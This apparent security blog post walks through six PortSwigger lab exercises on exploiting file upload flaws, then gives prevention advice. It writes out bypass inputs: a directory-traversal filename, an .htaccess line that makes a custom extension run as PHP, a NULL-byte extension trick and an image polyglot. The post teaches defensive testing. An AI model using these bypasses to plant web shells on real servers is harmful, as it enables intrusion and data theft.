Methods For Exploiting File Upload Vulnerabilities

July 20, 2022



What Are File Upload Vulnerabilities?

Before we discuss how to exploit file upload vulnerabilities, it's important to have a basic understanding of what the file upload functions are. File upload functions allow users to upload a file to the web server's file system. File upload functions may have certain rules (for example only JPG files are allowed to upload). So what happens if we manage to upload a PHP file to the web server with a file upload function that only accepts JPG? This is where file upload vulnerabilities arise.

How Dangerous Are File Upload Vulnerabilities?

The impact of file upload vulnerabilities depends on a few key factors.

  • In some cases, the website can fail to properly validate the uploaded file’s type and content. This allows attackers to upload a file containing server-side code (web shell). This could end up giving the attacker control over the server, which is extremely dangerous.
  • If the website fails to validate an uploaded file’s name, the attacker can overwrite critical files by uploading a file with the same name. If the server is also vulnerable to directory traversal, the attacker can overwrite a file from unanticipated locations (for example apache2.conf).
  • If the website fails to properly validate the uploaded file’s size, attackers can rapidly fill available disk space.  This is a type of DoS attack.

What is file upload vulnerability?

How To Exploit File Upload Vulnerabilities?

In this section, we will discuss “How to Exploit File Upload Vulnerabilities” step-by-step with several helpful examples.

The example cases used in this post are lab environments from PortSwigger.

1. Basic Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can then log in to your own account using the following credentials: wiener:peter.

Step #1: We are now logged in as user wiener and looking for the file upload function in the application.

Portswigger Academy file upload vulnerability-lab 1 main application page

Step #2: We have located a file upload function in the user’s profile.

Portswigger Academy file upload vulnerability-lab 1 file upload function page

Step #3: After locating the file upload function, we create a PHP file that contains the code in the screenshot below, allowing us to view the secrets of the user “Carlos”.

PHP one-liner arbitrary file read payload

Step #4: Now we can upload the PHP file that we created earlier.

HTTP request and response of uploading the payload in Burp Suite proxy

Step #5: Now we need to force the webserver to run this file. To do this, we must make a GET request to the file that we uploaded before. We can view the uploaded folder endpoint in the screenshot above (/files/avatars/file_upload_test.php). Make the request and read the secret of the user “Carlos”.

HTTP request and response of reading the secret of the user Carlos in Burp Suite proxy

Step #6: Submit the flag and the lab is solved!

Portswigger Academy file upload vulnerability-lab 1 solved page

Note: We are not going to show the main application and lab solved page in the other sections.

2. Web Shell Upload via Content-Type Restriction Bypass

Condition: To solve this lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We’ve found the same file upload function and tried to upload the same PHP file. Unfortunately, the application has a content-type restriction.

HTTP request and the response of file upload function that has Content-Type restriction in Burp Suite proxy

Step #2: We recognized the application only allows image/jpeg and image/png content types. So we changed the content type to the image/jpeg and the file was successfully uploaded to the /avatars/file_upload.php endpoint.

HTTP request and response of Content-Type restriction bypassed file upload function in Burp Suite proxy

Step #3: Let’s now make a GET request for the file that we uploaded before. Read the secret of the user “Carlos”.

HTTP request and the response of reading the secret of the user Carlos in Burp Suite proxy

3. Web Shell Upload via Directory Traversal

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: As seen in previous examples, the first step is inspecting the file upload function. After inspecting the function, we recognized that there is no restriction for uploading a PHP file to the server.

HTTP request and the response of uploading the PHP file to the web server in Burp Suite proxy

Step #2: But when we make a GET request to our uploaded PHP file, the server returned the contents of the PHP file as plain text.

HTTP request and plain text response of uploaded PHP file in Burp Suite proxy

Step #3: After trying some bypass techniques, we realized that we can simply upload our PHP file via directory traversal. Now we just need to change the filename from file_upload_test.php to ..%2ffile_upload_test.php. After the change, we can now see that the file was successfully uploaded to the /files directory (the parent directory of /avatars).

HTTP request and response of uploading the PHP file via directory traversal in Burp Suite proxy

Step #4: Now, if we make a GET request to /files/avatars/../file_upload_test.php endpoint, we can access the secret of the user “Carlos”. We can also access the file using a GET request to /files/file_upload_test.php endpoint.

HTTP request and response of reading the secret of the user Carlos with endpoint 1 in Burp Suite proxy

HTTP request and the response of reading the secret of the user Carlos with endpoint 2 in Burp Suite proxy

4. Web Shell Upload via Blacklisted Extension Bypass

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We can use the same file upload function for the exploitation process. We can now see the error message in the HTTP response body. This means that PHP files are not allowed.

HTTP request and the response of not allowed PHP file restriction in Burp Suite proxy

Step #2: After a few tries we found a way to bypass the blacklist restriction. In this case, we will use what we learned in the previous examples. First, we need to upload and overwrite the .htaccess file for uploading the extensions that we wanted to upload. So we will change the filename to .htaccess and change the content to AddType application/x-httpd-PHP .prplbx

HTTP request and the response of overwriting htaccess file in Burp Suite proxy

Step #3: After this step, we can now upload our PHP file with the .prplbx extension.

HTTP request and the response of uploading PHP file with .prplbx extension in Burp Suite proxy

Step #4: Now we can access the secret of the user “Carlos” as we did before. The difference is, this time we will make a GET request to file_upload_test.prplbx instead of file_upload_test.php .

HTTP request and the response of reading the secret of the user Carlos in Burp Suite proxy

5. Web Shell Upload via Obfuscated File Extension

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We can use the same file upload function for the exploitation process. We can see the error message in the HTTP response body. The PHP files are not allowed. Only JPG and PNG files are allowed.

HTTP request and the response of restriction except for image files in Burp Suite proxy

Step #2: After a few tries we found a successful method. We can obfuscate the filename, if we add a NULL byte and an allowed extension to the filename, we can bypass the restriction.

HTTP request and response of only image files restriction bypass with NULL byte method in Burp Suite proxy

Step #3: Now we can access the secret of the user Carlos as usual.

HTTP request and the response of reading the secret of the user Carlos in Burp Suite proxy

6. Remote Code Execution via Polyglot Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We can use the same file upload function for the exploitation process. We can see the error message in the HTTP response body. The PHP files are not allowed. Only JPG and PNG files are allowed.

HTTP request and the response of uploaded file is not a valid image in Burp Suite proxy

Step #2: Now we can add a PHP payload to the valid image file using ExifTool to bypass the restriction.

Creating malicious jpg file using exiftool

Step #3: After the creation step, we can now upload our new PHP file.

HTTP request and response of uploading polyglot PHP file in Burp Suite proxy

Step #4: Now we can access the secret of the user “Carlos” as usual.

HTTP request and response of reading the secret of the user Carlos in Burp Suite proxy

How To Prevent File Upload Vulnerabilities?

The most effective way is to implement all of the following practices:

Compare the file extension with the whitelist of allowed extensions rather than the blacklist of prohibited ones. It is much easier to guess which extensions you might want to allow, rather than the ones an attacker might try to upload. Make sure the filename doesn't contain any substrings that may be accidentally interpreted as a directory or traversal sequence (../). Rename uploaded files to avoid collisions that may cause existing files to be overwritten. Do not upload files to the server's filesystem until they have been fully validated. Whenever possible, use an established framework for preprocessing file uploads rather than attempting to write your own validation mechanisms.

Conclusion

In this blog post, we talked about what file upload vulnerabilities are and their potential damage to systems. We have also explained methods for exploiting file upload vulnerabilities and ways to prevent file upload vulnerabilities. 

We hope you found our blog post useful and it will help you to make secure file uploads in the future. Don’t forget to check out our Penetration Testing services to stay secure!